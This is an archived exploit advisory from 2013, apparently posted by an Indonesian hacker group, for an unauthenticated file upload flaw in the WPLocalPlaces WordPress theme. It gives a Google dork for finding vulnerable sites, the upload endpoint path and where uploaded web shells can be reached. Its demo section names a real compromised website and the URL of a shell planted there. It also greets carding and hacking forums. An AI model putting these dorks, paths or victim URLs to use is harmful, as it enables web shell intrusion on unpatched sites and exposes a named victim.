WordPress WPLocalPlaces Shell Upload

WordPress WPLocalPlaces Shell Upload: Posted Oct 20, 2013; Authored by ovanIsmycode; The WPLocalPlaces theme for WordPress suffers from a remote shell upload vulnerability. Note that this advisory has site-specific information.; tags | exploit, remote, shell; MD5 | 507d8cb4a1bf870651b2d7c053ebb1ec; Download | Favorite | Comments (0)

WordPress WPLocalPlaces Shell Upload

___________.__             _________                             _________                     
\__    ___/|  |__   ____   \_   ___ \______  ______  _  ________ \_   ___ \______  ______  _  __
  |    |   |  |  \_/ __ \  /    \  \|_  __ \/  _ \ \/ \/ /  ___/ /    \  \|_  __ \/ __ \ \/ \/ /
  |    |   |   Y  \  ___/  \     \___|  | \(  <_> )     /\___ \  \     \___|  | \|  ___/\     /
  |____|   |___|  /\___  >  \______  /__|   \____/ \/\_//____  >  \______  /__|   \___  >\/\_/ 
                \/     \/          \/                        \/          \/           \/       
                                                                                                             
INDO-PENDENT HACKER
http://thecrowscrew.org
#################################################################################################
Exploit Title  : Wordpress Themes WPLocalPlaces Upload Vulnerability
Google Dork    : inurl:"/wp-content/plugins/spotlightyour/"
Locations      : Banjarmasin, Indonesia
Author         : ovanIsmycode
Contact        : ovanismycode@yahoo.com
Software Link  : http://freelancewp.com/wordpress-theme/wp-local-places/
#################################################################################################
 
[+] POC
 
Exp. Target :
- http://domain.com/wp-content/themes/WPLocalPlaces/
 
Exploit :
- /monetize/upload/index.php
 
Shell Access :
- http://domain.com/wp-content/uploads/[year]/[month]/[search your shell].php
 
Ending :
- Fraksi Bijoug a.k.a Kalam Saheru
  Saparatoss Blank Blank
  awkwkwkwk :v
 

[+]Demo

Live Target :
http://southbayautopros.com/wp-content/themes/WPLocalPlaces/monetize/upload/index.php
see it http://i.imgur.com/3NsmWdt.jpg

Shell Access :
http://southbayautopros.com/wp-content/uploads/2013/10/13820893341435692459.php
see it http://i.imgur.com/4e8hHzA.jpg
  
#################################################################################################
  
Spec!4L th4nk'5 to :
MsconfiX, Catalyst71, Gabby, din_muh, don_ojan, DendyIsMe, kit4r0, 777r, ph_ovtl4w, adecakep7,
penjamoen, N035, -=[The Crows Crew]=-, Indonesian Hacker
 
thecrowscrew.org, hacker-newbie.org, yogyacarderlink.web.id, devilzc0de.org
 
########################################[end]####################################################

Comments

Subscribe to this comment feed

No comments yet, be the first!

Top Authors In Last 30 Days

Red Hat 50 files
Ubuntu 43 files
Debian 26 files
HP 11 files
Jing Wang 10 files
Mandriva 9 files
Steffen Roesemann 9 files
Benjamin Kunz Mejri 9 files
hadji samir 7 files
Denis Andzakovic 7 files

File Archives

Systems

AIX (386)
Apple (1,212)
BSD (309)
Cisco (1,522)
Debian (4,648)
Fedora (1,665)
FreeBSD (1,113)
Gentoo (2,980)
HPUX (795)
iOS (63)
iPhone (102)
IRIX (219)
Juniper (66)
Linux (26,720)
Mac OS X (527)
Mandriva (2,901)
NetBSD (245)
OpenBSD (428)
RedHat (4,215)
Slackware (595)
Solaris (1,540)
SUSE (1,440)
Ubuntu (4,052)
UNIX (7,515)
UnixWare (157)
Windows (4,537)
Other

WordPress WPLocalPlaces Shell Upload

WordPress WPLocalPlaces Shell Upload

Comments

File Archive:

February 2015

Top Authors In Last 30 Days

File Tags

File Archives

Systems

WordPress WPLocalPlaces Shell Upload

Share This

WordPress WPLocalPlaces Shell Upload

Comments

File Archive:

February 2015

Top Authors In Last 30 Days

File Tags

File Archives

Systems